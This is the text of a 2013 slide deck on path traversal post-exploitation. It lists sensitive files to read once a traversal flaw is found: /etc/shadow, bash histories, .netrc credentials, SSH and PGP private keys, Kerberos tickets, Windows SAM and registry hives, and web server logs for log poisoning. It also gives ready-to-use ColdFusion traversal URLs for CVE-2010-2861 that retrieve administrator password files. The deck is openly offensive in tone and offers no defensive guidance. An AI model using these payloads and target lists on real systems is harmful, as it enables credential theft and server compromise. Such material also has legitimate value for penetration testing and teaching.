Post on 25-Jul-2015
Path traversal post exploitationBy George Lagoda
Nov 23, 2013
This slide intentionally left blank(always dreamed of it )
Common understanding of path traversal
A Path Traversal attack aims to access files and directories that are stored outside the web root folder.
(OWASP)
WHAT FILES AND DIRS OUTSIDE THE WEB ROOT DO WE NEED AND WHY?
/etc/passwd – why so special?
Y.O.B.A. hacking
NEXT STEPS1. /root/.bash_history
if not accessible try harder:
/home/username/.bash_history game me:
Looks like epic win??:
After analyzing prepare_release.sh:
.netrc file• Provides remember me for ftpWhat I had when checked /home/username/.netrc :
machine ftp.server.comlogin secret_usr
password secret_pwd
Help for shell uploading/proc/self/environ /proc/self/statusUseful if we wannafind access or error logs of Apache, document root of the server or we also have LFI and wanna exploit Apache log poisoning
Smtg fo crds• SSH keys, often passwordless:
/home/*/.ssh/id*• Kerberos tickets: /tmp/krb5cc_*,
/tmp/krb5.keytab• PGP keys: /home/*/.gnupg/secring.gpgs
What distro we have?• /etc/SUSE-release # Novell SUSE • /etc/redhat-release, /etc/redhat_version # Red Hat• /etc/fedora-release # Fedora• /etc/slackware-release, • /etc/slackware-version # Slackware• /etc/debian_release, /etc/debian_version # Debian• /etc/mandrake-release # Mandrake• /etc/sun-release # Sun JDS• /etc/release # Solaris/Sparc• /etc/gentoo-release # Gentoo• /etc/arch-release # Arch Linux (file
will be empty)• arch # OpenBSD;
sample: “OpenBSD.amd64”
What about windows?
File Expected Contents / Description
%SYSTEMDRIVE%\boot.ini A file that can be counted on to be on virtually every windows host. Helps with confirmation that a read is happening.
%WINDIR%\win.ini This is another file to look for if boot.ini isn’t there or coming back, which is sometimes the case.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
It stores users' passwords in a hashed format (in LM hash and NTLM hash). The SAM file in \repair is locked, but can be retired using forensic or Volume Shadow copy methods
%SYSTEMROOT%\repair\system%SYSTEMROOT%\System32\config\RegBack\system
%SYSTEMDRIVE%\autoexec.bat
%SYSTEMDRIVE%\pagefile.sys Large file, but contains spill over from RAM, usually lots of good information can be pulled, but should be a last resort due to size
%WINDIR%\system32\logfiles\httperr\httperr1.log IIS 6 error log
%SystemDrive%\inetpub\logs\LogFiles IIS 7’s logs location
%WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log (year month day)
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log%USERPROFILE%\ntuser.dat
U really thought I will forget bout kittens?
• /etc/passwd• /etc/shadow (gotta try..)• /etc/shadow~ # (sometimes
there when edited withgedit)
• /etc/master.passwd• /etc/group• /etc/hosts• /etc/crontab• /etc/sysctl.conf
• /etc/resolv.conf• /etc/samba/smb.conf
• /etc/exports• /etc/auto.master• /etc/auto_maste• /etc/fstab• /etc/exports• /etc/sudoers
Some SW defaultshttp://wiki.apache.org/httpd/DistrosDefaultLayout
Also for cold fusion(not the last vers but still)
ColdFusion 6:http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00enColdFusion 7:http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00enColdFusion 8http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00enAll versions:
http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en
http://www.cvedetails.com/cve/CVE-2010-2861/
• In case if you still don’t have path traversal to post exploit it, may be this tool could be useful for you: http://dotdotpwn.blogspot.ru/
Why so serious?
Thank you for visiting us And
HACK YOU (the end).